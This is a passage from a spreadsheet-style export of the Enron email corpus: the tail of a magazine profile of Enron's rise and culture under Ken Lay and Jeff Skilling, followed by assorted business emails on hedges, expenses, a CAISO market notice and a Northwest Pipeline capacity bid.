But this company was a child of another time, that period in the mid-eighti=_x000D_
es when chaos enveloped the gas business. Federal deregulation of natural g=_x000D_
as turned a steady, secure industry, in which gas pipeline companies freque=_x000D_
ntly enjoyed a monopoly in portions of the areas that they served, into a v=_x000D_
olatile free-for-all. The situation was compounded five years later by fede=_x000D_
ral deregulation of the pipeline business. So it happened that a gentlemanl=_x000D_
y gas pipeline company, Houston Natural Gas (HNG) found itself under attack=_x000D_
 from Coastal Corporation, Oscar Wyatt's less than gentlemanly firm. HNG wa=_x000D_
s then run by Lay, a sturdy, taciturn former economics professor and Transc=_x000D_
o chief operating officer who had a passion for military strategy. (His doc=_x000D_
toral thesis at the University of Houston was on supply and demand in the V=_x000D_
ietnam War.) Lay, who was from Missouri and never succumbed-at least outwar=_x000D_
dly-to Texas brashness, had done well enough: Thanks to canny expansions, H=_x000D_
NG's pipelines stretched from Florida to California and throughout the stat=_x000D_
e of Texas._x000D_
HNG fended off Coastal, but to protect the company from other takeover atte=_x000D_
mpts, Lay nimbly engineered the sale of HNG in 1985 to a friendly Nebraska =_x000D_
pipeline concern called InterNorth, one of the largest pipeline companies i=_x000D_
n the country at the time. Then, a funny thing happened: HNG started acting=_x000D_
 in a way that would characterize the company for years to come-a lot like =_x000D_
Coastal. What the Nebraskans blithely labeled "the purchase" was being call=_x000D_
ed "the merger" back in Houston, and before long, following some particular=_x000D_
ly brutal politicking between Omaha and Houston, the company's center of gr=_x000D_
avity started shifting toward Texas, and shortly after that, Ken Lay was ru=_x000D_
nning a new company called Enron. "Over time it became clear that Lay had a=_x000D_
 better vision of the future," says one person associated with Enron at tha=_x000D_
t time. "He never fought change. He embraced change."_x000D_
Lay had won, but what exactly did that mean? Enron was saddled with massive=_x000D_
 debt from the takeover attempt, and thanks to deregulation, no longer had =_x000D_
exclusive use of its pipelines. Without new ideas-for that matter, a whole =_x000D_
new business plan-the company could be finished before it really even got s=_x000D_
tarted.=20_x000D_
LIKE MANY PEOPLE WHO TEAMED UP WITH ENRON IN THE EIGHTIES, Jeff Skilling ha=_x000D_
d spent a lot of time in the Midwest, and he was self-made-at fourteen he h=_x000D_
ad been the chief production director at a start-up TV station in Aurora, I=_x000D_
llinois. (His mother would drop him off there every day after school.) "I l=_x000D_
iked being successful when I was working, and I was smart," he told Busines=_x000D_
sWeek earlier this year. But unlike many of his Enron colleagues, Skilling =_x000D_
wasn't deliberate and soft-spoken and happy to go home at five o'clock; he =_x000D_
was anxious and excitable, and nothing, but nothing excited him more than w=_x000D_
hat he would come to call "intellectual capital." He loved being smart, and=_x000D_
 he loved being surrounded by smart people. He graduated from Southern Meth=_x000D_
odist University, went into banking-assets and liability management-and too=_x000D_
k on Harvard Business School, where he graduated in the top 5 percent of hi=_x000D_
s class. Then Skilling took the next step on what was then the new, souped-=_x000D_
up path to American success: He joined Manhattan's McKinsey and Company as =_x000D_
a business consultant, and that is where Ken Lay found him in 1985.=20_x000D_
It is often said of Lay that his instincts for hiring the best are flawless=_x000D_
, and his choice of Skilling probably saved the company. Skilling was above=_x000D_
 all an expert at markets and how they worked. While everyone else was worr=_x000D_
ying about the gluts and the shortages that defined the gas industry, he al=_x000D_
one saw the parallels between gas and other businesses. And so in a world w=_x000D_
here credit was nearly impossible to come by, Skilling came up with what he=_x000D_
 called the Gas Bank, which contractually guaranteed both the supply and th=_x000D_
e price of gas to a network of suppliers and consumers. Enron would not be =_x000D_
a broker but a banker. It would buy and sell the gas itself and assume the =_x000D_
risk involved. And Enron would make money on transactions, much like an inv=_x000D_
estment bank would._x000D_
Skilling worked up some numbers and found them "absolutely compelling." The=_x000D_
n the McKinsey consultant took the idea to a meeting of about 25 Enron exec=_x000D_
utives. He had a one-page presentation. "Almost to a person," Skilling says=_x000D_
, "they thought it was stupid." Almost. After Skilling left the meeting dej=_x000D_
ected, he walked Ken Lay to an elevator and apologized. Lay listened and th=_x000D_
en said, "Let's go."_x000D_
The Gas Bank was not an overnight success. For months Skilling woke up in a=_x000D_
 cold sweat, sure he had ruined not only his career but the careers of doze=_x000D_
ns of colleagues who had assisted him. In fact, he had come upon one of tho=_x000D_
se divides that seem to define his life: "I believed this whole world would=_x000D_
 be different, a huge breakthrough" is the way Skilling puts it today, and =_x000D_
even if he is typically immodest, he was right. Fairly soon after launching=_x000D_
, the company sold $800 million worth of gas in a week. True to Skilling's =_x000D_
character, success turned out to be a matter of old versus new: He says the=_x000D_
 joke around Enron was that if a company's CEO was under fifty, "We were in=_x000D_
." And he was in too: In 1990 Skilling finally left McKinsey and joined Enr=_x000D_
on as the head of Enron Finance Corporation, a new division created just fo=_x000D_
r him. In 1991 that company closed a deal that earned $11 million in profit=_x000D_
. After that, says Skilling, "we never looked back."_x000D_
Skilling and Lay also realized that the Gas Bank couldn't work unless it ha=_x000D_
d a trading component. Myriad trades were needed to build the market that w=_x000D_
ould make the project go. But by buying and selling enormous quantities of =_x000D_
gas, Enron not only constructed a market but almost instantly came to domin=_x000D_
ate it. The company had the best contacts, the best intelligence, and the b=_x000D_
est access to supplies. That, in turn, attracted more customers who wanted =_x000D_
to be part of the play. With so many customers in its pocket, Enron could b=_x000D_
etter predict the direction of the market and could use that knowledge to m=_x000D_
ake trades for its own benefit-Enron could in effect bet on which way the p=_x000D_
rice of gas would go, as one might do with pork bellies or soybeans, but wi=_x000D_
th startling accuracy, thereby generating profits higher than anyone could =_x000D_
have ever imagined._x000D_
THIS CHANGE COULD NEVER HAVE OCCURRED without another change Skilling had m=_x000D_
ade: He created, within Enron, a new culture to match its new trading busin=_x000D_
ess. The idea was to build a "knowledge-based business," which demanded a s=_x000D_
kill set not exactly prized by Enron's employees from the old HNG days. Mos=_x000D_
t were deliberate, cautious, responsible, somewhat defensive people, most o=_x000D_
f them men, of course-the kind of people you'd expect to find working in an=_x000D_
 industry regulated by the federal government. But now the company needed b=_x000D_
older people for its bold new era: that included anyone who wanted to make =_x000D_
money-lots of money-for themselves and for the company. "Enron was going to=_x000D_
 create a niche for itself or die," one former executive explains. "The peo=_x000D_
ple who had narrow views eventually were forced out, because if they had na=_x000D_
rrow views about other things, they had narrow views about the market."_x000D_
Skilling wanted smart people but not just any smart people. He wanted the s=_x000D_
martest people from schools like Harvard, Stanford, and maybe, Rice. And be=_x000D_
cause his firm was now acting more like a bank than a pipeline company, he =_x000D_
wanted to draw from the pool of recruits that would be attracted to the big=_x000D_
gest and best investment banks, like Merrill Lynch or Credit Suisse First B=_x000D_
oston. In addition to being smart, Enron people were also supposed to be "a=_x000D_
ggressive." You were right for Enron if you didn't want to wait until you w=_x000D_
ere thirty to close your own deals or move up in an organization.=20_x000D_
You could see what he was looking for on "Super Saturdays" at the Houston h=_x000D_
eadquarters: eight fifty-minute interviews with ten minute breaks in betwee=_x000D_
n-the company might herd as many as four hundred people through in just one=_x000D_
 day. They were scored from 1 to 5 on their smarts, their problem-solving a=_x000D_
bility, their passion for hard work, and what at Enron was called "a sense =_x000D_
of urgency." People who scored less than 2.5 were scratched. The shrewdest =_x000D_
candidates knew how to work Enron before they were even hired: These were t=_x000D_
he types that automatically turned down the company's first offer, knowing =_x000D_
Enron would come back with more. The starting salary was around $80,000. Ma=_x000D_
ybe it wasn't a fortune-yet-but the signing bonus, about $20,000, was more =_x000D_
than enough for a lease on the obligatory Porsche Boxster or one of the lof=_x000D_
ts being renovated close to downtown. (Enron people didn't live in far-flun=_x000D_
g suburbs. Suburbs were uncool and too far from the office.)_x000D_
For the lucky winners, Enron offered the corporate equivalent of a gifted-a=_x000D_
nd-talented program. New associates learned the latest techniques for struc=_x000D_
turing energy deals, and there were rotations at Enron offices around the g=_x000D_
lobe. The hours were long, but every possible need was taken care of. A com=_x000D_
pany concierge handled all the things important people couldn't be bothered=_x000D_
 with: picking up dry cleaning or prescriptions, shining shoes, cleaning th=_x000D_
e house, planning a vacation. Of course, a lot of people who worked for Enr=_x000D_
on never got to take vacations-they were too busy making money-but they cou=_x000D_
ld use the company gym and the company's personal trainers. If they were ov=_x000D_
erweight or wanted to quit smoking, they could join Enron's Wellness Progra=_x000D_
m. Massages were offered six days a week, from seven in the morning until t=_x000D_
en at night. "They were so cutting edge," rhapsodizes someone involved with=_x000D_
 the company health care program at the time. "They really thought about th=_x000D_
e psychology and what it took to keep these people going."_x000D_
Skilling handed out titles analogous to those at Wall Street firms-analysts=_x000D_
, associates, directors, and managing directors-but everyone knew that thos=_x000D_
e titles didn't really matter. Money did. Instead of competitive salaries a=_x000D_
nd decent bonuses, Enron offered competitive salaries and merit-based bonus=_x000D_
es-with no cap. "If you really worked hard and delivered results, you could=_x000D_
 make a lot of money," says Ken Rice, who stayed with Enron for 21 years un=_x000D_
til resigning recently as the head of the company's faltering broadband div=_x000D_
ision. Or, as the saying goes, you got to eat what you killed. Gas traders =_x000D_
with two or three years of experience could wind up with a $1 million bonus=_x000D_
. And the more you produced, the closer you got to Jeff: Real hot dogs join=_x000D_
ed him glacier hiking in Patagonia, Land Cruiser racing in Australia, or of=_x000D_
f-road motorcycling in a re-creation of the Baja 1,000 race, ending at a sp=_x000D_
ectacular Mexican villa. "Every time he'd speak, I'd believe everything he'=_x000D_
d say," one loyalist says.=20_x000D_
And why not? By 1995 Enron had become North America's largest natural-gas m=_x000D_
erchant, controlling 20 percent of the market. But at a company where the b=_x000D_
uzzword was "aggressive," that was no place to stop: Skilling and Lay belie=_x000D_
ved the Gas Bank model could easily be applied to the electricity business.=_x000D_
 Firmly committed to the notion that a deregulated market meant better serv=_x000D_
ice at lower prices for consumers (and untold profits for Enron), they bega=_x000D_
n barnstorming the country, pressing their case with entrenched power compa=_x000D_
ny presidents (who, with their multimillion-dollar salaries and monopoly se=_x000D_
rvice areas, had little incentive to change) and energy regulators (who wer=_x000D_
e somewhat more receptive, thanks in part to Enron's generous lobbying effo=_x000D_
rts)._x000D_
But the biggest winner of all was probably Jeff Skilling. In 1997 Ken Lay m=_x000D_
ade him the president and chief operating officer of the company. By then, =_x000D_
the division known as Enron Capital and Trade Resources was the nations lar=_x000D_
gest wholesale buyer and seller of natural gas and electricity. The divisio=_x000D_
n had grown from two hundred to two thousand employees, and revenues from $=_x000D_
2 billion to $7 billion. "Mr. Skilling's experience so far with the turmoil=_x000D_
 in the industry has convinced him that he is on the right track," the New =_x000D_
York Times noted. Everyone would certainly have thought so: Enron and Skill=_x000D_
ing had totally transformed one industry and were well on their way to tran=_x000D_
sforming another._x000D_
"FIRING UP AN IDEA MACHINE; Enron Is Encouraging the Entrepreneurs Within,"=_x000D_
 sang the New York Times in 1999. "In the staid world of regulated utilitie=_x000D_
s and energy companies, Enron Corp is that gate-crashing Elvis," crowed For=_x000D_
tune in 2000. Wall Street was demanding tech-size growth on a tech timetabl=_x000D_
e, and Enron, in 2000, obliged with second quarter earnings of $289 million=_x000D_
, up 30 percent from the previous year. That year the company seemed to dis=_x000D_
cover a market a minute: Under Skilling, Enron was trading coal, paper, ste=_x000D_
el, and even weather. No one blinked when a London wine bar became an Enron=_x000D_
 client. People drank more in warm weather than cold, so why not buy a hedg=_x000D_
e against the usual winter downturn?_x000D_
But most exciting to the financial world was Enron's entry into high-tech c=_x000D_
ommunications. Because of the company's marketing dominance, EnronOnline be=_x000D_
came another overnight success, handling $335 billion in commodity trades o=_x000D_
nline in 2000. Enron, as usual, made its money on the spread between the bi=_x000D_
d price and the asking price. Then there was the broadband business: To Enr=_x000D_
on, trading excess capacity in large, high-speed fiber-optic networks (empt=_x000D_
y lanes on the fabled information highway) wasn't that different from tradi=_x000D_
ng the capacity of natural gas pipelines. So Enron created a market for wha=_x000D_
t the industry calls bandwidth. Soon after, it also announced a twenty-year=_x000D_
 deal with Blockbuster to deliver movies on demand electronically to people=_x000D_
 in their homes. Enron looked like a company that couldn't lose. "Its strat=_x000D_
egy of building businesses, shedding hard assets, and trading various commo=_x000D_
dities can help it do well even in an uncertain market," BusinessWeek insis=_x000D_
ted._x000D_
There was, however, another reason Enron did so well in such a short time: =_x000D_
the company's hard-nosed approach toward its customers. The old notion of c=_x000D_
ustomer service was based on the long haul-you had to nurse and coddle cust=_x000D_
omers to keep them. But Enron had new markets and new ideas-customers had t=_x000D_
o come to it. Over time, the company stopping referring to its business cli=_x000D_
ents as customers and began calling them "counterparties."_x000D_
Skilling wanted the biggest profits on the shortest timetable: Gains were m=_x000D_
aximized by creating, owning, and then abandoning a market before it became=_x000D_
 overtaxed and overregulated. So if you wanted to launch a high-risk ventur=_x000D_
e quickly-such as Zilkha Energy's new high-tech approach to drilling for oi=_x000D_
l-you got your financing from Enron because a bank would take forever to un=_x000D_
derwrite the project, if it ever would. But because Enron invented its mark=_x000D_
ets and subsequently dominated them, Enron could set the terms of its deals=_x000D_
, from the timeline to the method of accounting to whether the deal happene=_x000D_
d at all.=20_x000D_
While many businesses used what was known in the industry as "mark-to-marke=_x000D_
t accounting," for instance, Enron used it on an unprecedented scale. The c=_x000D_
ompany priced their deals at current market value-but it was always Enron's=_x000D_
 idea of the market value; companies that balked at their pricing didn't ge=_x000D_
t deals. And while old-fashioned companies spread their profits out like an=_x000D_
nuities over a period of years, Enron took most of its profit up-front. How=_x000D_
ever many millions would be made on a deal that covered several years, they=_x000D_
 went on the books in the current year. If a few analysts thought there mig=_x000D_
ht be something fishy about what they called "subjective accounting," inves=_x000D_
tors didn't particularly care as long as the profits rolled in. As the mark=_x000D_
et fluctuated and the landscape changed, the company might abandon a projec=_x000D_
t that had been in the works for months because its profit margins weren't =_x000D_
going to be high enough. "Enron is known for leaving people at the altar," =_x000D_
says one former employee. Winning the highest possible profits for the comp=_x000D_
any could even extend to Enron's attitude toward charity. When a fundraiser=_x000D_
 for the Houston READ Commission, a literacy group, called on Enron for a c=_x000D_
ontribution, it was suggested that he start raising money for Enron's compe=_x000D_
ting literacy charity: "Even the person who was supposed to give money away=_x000D_
 for Enron was supposed to make money for Enron," he says._x000D_
As Enron became more and more successful, the culture Skilling had created =_x000D_
took on a dark side: The competition turned inward. As one member of the En=_x000D_
ron family put it, "It became a company full of mercenaries." The change st=_x000D_
arted at the bottom. As Enron's domination of the energy market grew, most =_x000D_
of the recruiting frills fell away. New associates were treated much like t=_x000D_
he commodities the company traded. Global Change's Enron spies reported ove=_x000D_
rhearing orders like "I need a smart person-go buy me one" or "Buy me an in=_x000D_
telligent slave, quick." Enron had never been the kind of place where peopl=_x000D_
e sang to you on your birthday, but now the workaholism bordered on self-pa=_x000D_
rody: A Random Acts of Kindness program lasted only a few months. It was to=_x000D_
o disruptive. People couldn't get their work done._x000D_
And, of course, Enron had a program for institutionalizing creative tension=_x000D_
. The Performance Review Committee, which had initially been installed by S=_x000D_
killing in the Capital group, became known as the harshest forced ranking s=_x000D_
ystem in the country. Employees were rated on a scale of one to five, and t=_x000D_
hose with fives were usually gone within six months. (The PRC's nickname qu=_x000D_
ickly became "rank and yank.") It was a point of pride that Skilling's divi=_x000D_
sion replaced 15 percent of its workforce every year. As one Skilling assoc=_x000D_
iate put it, "Jeff viewed this like turning over the inventory in a grocery=_x000D_
 store." Skilling's approach to business-get in and get out-had become Enro=_x000D_
n's attitude toward its workers. In time, it would become many workers' att=_x000D_
itude toward the company. Teamwork, never that valuable in a trading cultur=_x000D_
e, went the way of the eyeshade and the abacus. If protocol required an Enr=_x000D_
on higher-up to come from Europe to help with a project in the Third World,=_x000D_
 he might help-or he might not, depending on whether another, potentially m=_x000D_
ore lucrative project was pending elsewhere._x000D_
Everyone felt the pressure to perform on a massive scale at massive speed: =_x000D_
"They were so goal oriented toward immediate gratification that they lost s=_x000D_
ight of the future," says one former employee. Anyone who couldn't close de=_x000D_
als within a quarter was punished with bad PRC scores, as were the higher-u=_x000D_
ps who had backed them. Past errors and old grudges were dredged up so ofte=_x000D_
n as new ammunition in PRC meetings that the phrase "No old tapes" became a=_x000D_
n Enron clich?. "People went from being geniuses to idiots overnight," says=_x000D_
 one former Enron executive._x000D_
In such a hothouse, paranoia flowered. New contracts contained highly restr=_x000D_
ictive confidentiality agreements about anything pertaining to the company.=_x000D_
 E-mail was monitored. A former executive routinely carried two laptops, on=_x000D_
e for the company and one for himself. People may have been rich at Enron, =_x000D_
but they weren't necessarily happy. One recruiter described the culture thi=_x000D_
s way: "They roll you over and slit your throat and watch your eyes while y=_x000D_
ou bleed to death."_x000D_
BEFORE JEFF SKILLING COULD TRANSFORM ENRON from the world's leading energy =_x000D_
company into the world's leading company, he had to make one more change: J=_x000D_
ust as he had done ten years before, Skilling had to purge the company of i=_x000D_
ts remaining old order. Where Enron once prized cautious executives who dea=_x000D_
lt with tangible assets like pipelines, it now valued bold executives who d=_x000D_
ealt with intangible assets. Pipelines, power plants-they may have been Enr=_x000D_
on's pride, but Skilling wanted them gone. Expensive, long-term building pr=_x000D_
ojects had no place when Wall Street was devoted to quick profits and enorm=_x000D_
ous returns on investment capital, and Skilling knew it. "It wasn't the tim=_x000D_
e for long-term approaches," an Enron executive says of Wall Street's mood.=_x000D_
 "It was the technology era."_x000D_
To rid Enron of the last vestiges of its past, Skilling had to take on Rebe=_x000D_
cca Mark, long considered his rival for the CEO's job. Mark was for many ye=_x000D_
ars the poster child for the Enron way: Young, attractive, aggressive-her n=_x000D_
ickname was Mark the Shark-she came from sturdy Midwestern stock but had th=_x000D_
e requisite Harvard MBA. Mark was largely responsible for the success of En=_x000D_
ron International, the asset-heavy side of the company where she developed =_x000D_
$20 billion worth of gas and power plants, which accounted for 40 percent o=_x000D_
f Enron's profits in 1998. For this she reaped breathtaking compensation-on=_x000D_
e Enron executive estimated $10 million-and adoring press clips, including =_x000D_
two appearances on Fortune's list of the fifty most powerful women in corpo=_x000D_
rate America._x000D_
But then Mark ran into trouble with a gas-fired power plant in Dabhol, Indi=_x000D_
a, one of the largest ever constructed. She had played the game the Enron w=_x000D_
ay: Taking Enron into a new market, she had finagled low import taxes (20 p=_x000D_
ercent instead of the usual 53) and hung in through 24 lawsuits and three c=_x000D_
hanges in government. But the time and expense needed to make India and oth=_x000D_
er Enron plants around the globe successful did not mesh with Enron's goals=_x000D_
, and Skilling's impatience with Mark grew._x000D_
Forcing Mark out, however, was no easy matter. Key executives left, divisio=_x000D_
ns were dismantled, but she remained. The truth was Enron didn't mind firin=_x000D_
g lower-level employees, but it hated to fire the kind of aggressive, relen=_x000D_
tless people it tended to promote. The company preferred humiliation-keepin=_x000D_
g a director in his cubicle, say, but failing to include him in the glamour=_x000D_
 deals, or kicking someone upstairs with a fancy title. (One particularly d=_x000D_
ifficult executive won a few years at graduate school, gratis.) A company a=_x000D_
s smart as Enron could probably deduce too that dispatching one of the most=_x000D_
 visible businesswomen in the country would provoke a public-relations disa=_x000D_
ster. So Lay and Skilling did something classically Enronian: They gave Mar=_x000D_
k her own company. Despite Skilling's contempt for asset-heavy businesses, =_x000D_
Enron spent more than $2 billion to buy a run-of-the-mill British water uti=_x000D_
lity that could serve as Enron's entry into the emerging world of water pri=_x000D_
vatization. Mark was put in charge of making Enron, yes, the world's greate=_x000D_
st water company. Azurix, as the new business was called, looked like anoth=_x000D_
er sure thing: Its IPO in 1999 raised $695 million.=20_x000D_
But Mark had to succeed on Enron's increasingly abbreviated timetable in a =_x000D_
business fraught with political and emotional complexities. Water is not li=_x000D_
ke gas or electricity-owners and governments are a lot less willing to give=_x000D_
 it up, even for lots of money. The</t>
  </si>
  <si>
    <t>Tue, 28 Aug 2001 11:13:09 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'d..steffes@enron.com', 'jeff.dasovich@enron.com', 'richard.shapiro@enron.com'})</t>
  </si>
  <si>
    <t>PLEASE LOOK AT THIS</t>
  </si>
  <si>
    <t xml:space="preserve">I prepared these bullet points for AReM based on an e-mail Dan Douglass sent questioning the constitutionality of the CPUC's action.  AReM's PR firm will turn this into a hand out.  Jeanne is getting back to me on the legal arguments._x000D_
 </t>
  </si>
  <si>
    <t>Thu, 22 Feb 2001 22:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Additional Promotion in the Government Affairs-The Americas_x000D_
 Group</t>
  </si>
  <si>
    <t xml:space="preserve">Rick-_x000D_
_x000D_
I'm very impressed that you sent out such a lovely, personalized _x000D_
announcement.  It is obvious that you care about your team! _x000D_
_x000D_
From London,_x000D_
Meredith  </t>
  </si>
  <si>
    <t>Fri, 30 Jun 2000 00:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'robert@mresearch.com'})</t>
  </si>
  <si>
    <t>Re: Follow up....</t>
  </si>
  <si>
    <t xml:space="preserve">Gentlemen, as we speak Enron's Credit and Legal teams are conversing on the _x000D_
best way to approach, either an ISDA or a Long Form Confirm, for "papering" _x000D_
the requested financial hedge.  Once Enron Credit is "comfortable" with _x000D_
Bellingham Cold Storage (BCS), Legal will prepare the necessary _x000D_
documentation, once approved by BCS/John Cameron, I will quote work up some _x000D_
July executable numbers and attempt to contact the Robert, Doug, John C.  _x000D_
This will require everyone's joint efforts in order to accomplish this in _x000D_
such a short time line.  BCS and John Cameron should anticipate a call from _x000D_
either or Enron's Credit and Legal personnel.  Thanks,  John_x000D_
_x000D_
_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  Robert McCullough &lt;robert@mresearch.com&gt;                           _x000D_
06/30/2000 06:55 AM_x000D_
	_x000D_
_x000D_
To: John Malowney &lt;John.Malowney@enron.com&gt;_x000D_
cc: Doug Thomas &lt;Doug.Thomas@bellcold.com&gt;, John Cameron _x000D_
&lt;johncameron@dwt.com&gt; _x000D_
Subject: Good morning!_x000D_
_x000D_
_x000D_
We need numbers as soon as possible this morning -- also these must be_x000D_
serious -- not notional._x000D_
_x000D_
I am at 771-5090.  I will be available at 784-3758 all day.  My email_x000D_
follows me around so you can always get me  on email._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 17 Jul 2001 12:06:21 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Debra</t>
  </si>
  <si>
    <t>Anne,_x000D_
_x000D_
No problem. I have retained Debra to offer a course for 20 persons in October._x000D_
You are very welcome to attend._x000D_
_x000D_
Vince_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Labbe, Anne  _x000D_
Sent:	Monday, July 16, 2001 6:10 PM_x000D_
To:	Kaminski, Vince J_x000D_
Subject:	Debra_x000D_
_x000D_
Vince,_x000D_
_x000D_
Please accept my apologies for not being able to meet with you and Debra on Friday.  I was in a meeting that I could not gracefully depart from.  However, I am very interested in learning what Debra suggested, and what decisions were made.  _x000D_
_x000D_
Thanks,_x000D_
Anne</t>
  </si>
  <si>
    <t>Thu, 13 Dec 2001 09:38:44 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'susan.helton@enron.com', 'doug.sewell@enron.com'})</t>
  </si>
  <si>
    <t>Denver Office Expenses</t>
  </si>
  <si>
    <t xml:space="preserve">Please email us the proper forms and the Process Diagram for the payment requests._x000D_
Theresa Staab will be the point person for the Denver office and I will be her backup._x000D_
_x000D_
_x000D_
Mark Whitt 303-575-6473_x000D_
Cell 	     303-807-3961_x000D_
_x000D_
Theresa Staab 303-575-6485_x000D_
Cell                 303-807-6131_x000D_
_x000D_
	</t>
  </si>
  <si>
    <t>Mon, 9 Oct 2000 05:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>New Power Bookout deal</t>
  </si>
  <si>
    <t>We bought back some of New Powers first of the month volumes on deal 431846.  _x000D_
Please match this deal with 431849._x000D_
_x000D_
I did this deal on the 5th and its effective the 7th - 31st.</t>
  </si>
  <si>
    <t>Wed, 9 Jan 2002 08:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>CAISO Notice: Market Design 2002 Draft Proposal</t>
  </si>
  <si>
    <t>Market Notice_x000D_
_x000D_
January 9, 2002_x000D_
_x000D_
ISO Market Participants:_x000D_
_x000D_
The ISO has posted its Draft Market Design 2002 on it's web site. You can_x000D_
access the document at:_x000D_
http://www.caiso.com/docs/2001/12/21/2001122108490719681.html_x000D_
_x000D_
If you have any questions, please contact Byron Woertz at 916-608-7066 or_x000D_
bwoertz@caiso.com._x000D_
_x000D_
Client Relations Communications.1104_x000D_
CRCommunications@caiso.com &lt;mailto:CRCommunications@caiso.com&gt;</t>
  </si>
  <si>
    <t>Tue, 9 Jan 2001 13:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>ENA/EGM/EIM Holiday Party Photo Link</t>
  </si>
  <si>
    <t>Please click on the attached link to view photos from the ENA/EIM/EGM Holiday _x000D_
Party._x000D_
_x000D_
http://holidayparty.corp.enron.com/_x000D_
_x000D_
_x000D_
Please contact Michelle Vitrella x39767 if you need assistance.</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 08:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'susan.t.turpin@williams.com'})</t>
  </si>
  <si>
    <t>frozenset({'wharlan@ix.netcom.com', 'agcdu6@triax.com', 'jmmcarthur@duke-energy.com', 'janderson@clarkpud.com', 'ryan.watt@enron.com', 'spjutd2@wdni.com', 'ramperms@bp.com', 'bblanar@coral-energy.com', 'kri.pam@pdg.net', 'rfm@nwnatural.com', 'cmcgra@puget.com', 'tgilliam@avistaenergy.com', 'dlh@nwnatural.com', 'klambe@puget.com', 'rony@panalberta.com', 'sbrewer@enron.com', 'cards@wdni.com', 'anita.reubens@swgas.com', 'dave.dungan@weyerhaeuser.com', 'tdizona@coral-energy.com', 'jennifer_owen@pgn.com', 'scotts@kimballenergy.com', 'llightfoot@coral-energy.com', 'niels_a_vervloet@reliantenergy.com', 'bob.mattice@engageenergy.com', 'deborahs@kimballenergy.com', 'zcourns@national-fuel.com', 'ccoyle@americansoda.com', 'geek@bp.com', 'jane@itcoworld.com', 'gilesmh@bp.com', 'tom.mckay@engageenergy.com', 'stephane.brodeur@enron.com', 'jsanders@clarkpud.com', 'lmanis@sdge.com', 'agcdu1@triax.com', 'derek.danyliw@husky-oil.com', 'browning@wasatchenergy.com', 'kims@kimballenergy.com', 'bruce.langmade@fortjamesmail.com', 'val_yildirok@pgn.com', 'cridin@puget.com', 'bymank@wdni.com', 'gacynth_adam@transcanada.com', 'lprior@enron.com', 'robert.harp@engageenergy.com', 'sgwi@dynegy.com', 'ssouth@enron.com', 'sghill@bcgas.com', 'abenton@utilicorp.com', 'fermis@enron.com'})</t>
  </si>
  <si>
    <t>NWP System Notice - 01-186 Soliciting Electronic Bids</t>
  </si>
  <si>
    <t xml:space="preserve">Post Date: December 11, 2000 _x000D_
Category: SHORT-TERM FIRM CAPACITY _x000D_
Subcategory: NWP OFFERS _x000D_
Subject: 01-186? Soliciting Electronic Bids _x000D_
_x000D_
Notice Text: _x000D_
_x000D_
All Shippers Notification: 01-186?????? ??????? Dated December 11, 2000 _x000D_
_x000D_
_x000D_
_x000D_
TO:???? ALL SHIPPERS _x000D_
_x000D_
FROM:?? Candace C. Karpakis- (801) 584-6996 wk _x000D_
?????????????????????? (801) 971-5983 cellular _x000D_
_x000D_
?????????????????????? Williams Gas Pipeline-West _x000D_
?????????????????????? Northwest Pipeline Transportation _x000D_
_x000D_
SUBJECT:??????? SOLICITING ELECTRONIC BIDS FOR AVAILABLE FIRM _x000D_
?????????????????????? MAINLINE TRANSPORTATION CAPACITY ON NORTHWEST'S _x000D_
?????????????????????? TRANSMISSION SYSTEM _x000D_
_x000D_
Northwest has posted the following package of available firm TF-1 _x000D_
Large Customer transportation capacity to its Electronic Bulletin _x000D_
Board ("EBB") for competitive bid pursuant to the "Right-of-First- _x000D_
Refusal; Posting of Pipeline Capacity" provision of Northwest's _x000D_
Tariff, which requires availability of capacity to be posted to the _x000D_
EBB subject to bid.? All prearranged terms are indicated below, if _x000D_
applicable.? The prearranged shipper has the right to match the _x000D_
highest economic value at the end of the bid period.? If the _x000D_
prearranged shipper does not match the highest economic value, award _x000D_
of such capacity will be made according to Northwest's tariff. _x000D_
_x000D_
NOTE:? BIDS FOR POSTED CAPACITY WILL BE CONDUCTED ELECTRONICALLY AS _x000D_
CLOSED BIDS ON NORTHWEST PIPELINE'S EBB.? Please contact Candace _x000D_
Karpakis or your Marketing Services Representative if you encounter _x000D_
any problems with your EBB bid(s).? DON'T WAIT UNTIL THE LAST MINUTE _x000D_
TO POST YOUR BID.? Time deadlines are electronically monitored and _x000D_
implemented. _x000D_
_x000D_
PACKAGE "C" _x000D_
From the _x000D_
December 8, 2000 Posting _x000D_
EBB OFFER # 452 _x000D_
_x000D_
RECEIPT??????????? DELIVERY?????????? TOTAL????????? INITIAL _x000D_
PRIMARY???????????? PREARRANGED _x000D_
POINT??????????????? POINT????????????????? DTH/D?????????? CONTRACT _x000D_
TERM??????????? OFFER _x000D_
_x000D_
Sumas?????? Puget (Canyon)???????? 5,000?????????? 01/01/01 - _x000D_
01//31/01??????????? YES _x000D_
_x000D_
Min. Acceptable Bid:??? $0.05 per Dth of daily Reservation Contract Demand _x000D_
for _x000D_
?????????????????????????????????????????????? Flexible Receipt/Delivery _x000D_
Point Rights _x000D_
Min. Acceptable Bid Vol:??????? 1 Dth/d _x000D_
Max. Acceptable Bid Vol:??????? 5,000 Dth/d _x000D_
Bid Open Date:??????????????????? ????? 12/11/00 - (3:30 pm Central Time) _x000D_
Bid Close Date: 12/12/00 - (3:30 pm Central Time) _x000D_
Award Deadline: 12/12/00 - (4:30 pm Central Time) _x000D_
Evergreen:????? ??????? Month to Month, Ten (10) Business Days Prior Written _x000D_
?????????????????????????????????????????????? Notice by Either Party _x000D_
Special Terms &amp; Cond:?? See 1, 2 and 3 Below. _x000D_
_x000D_
_x000D_
SPECIAL TERMS AND CONDITIONS _x000D_
_x000D_
1. The discount rate shall apply to points utilized by the original shipper _x000D_
??????? entering into the transportation agreement with Northwest. _x000D_
_x000D_
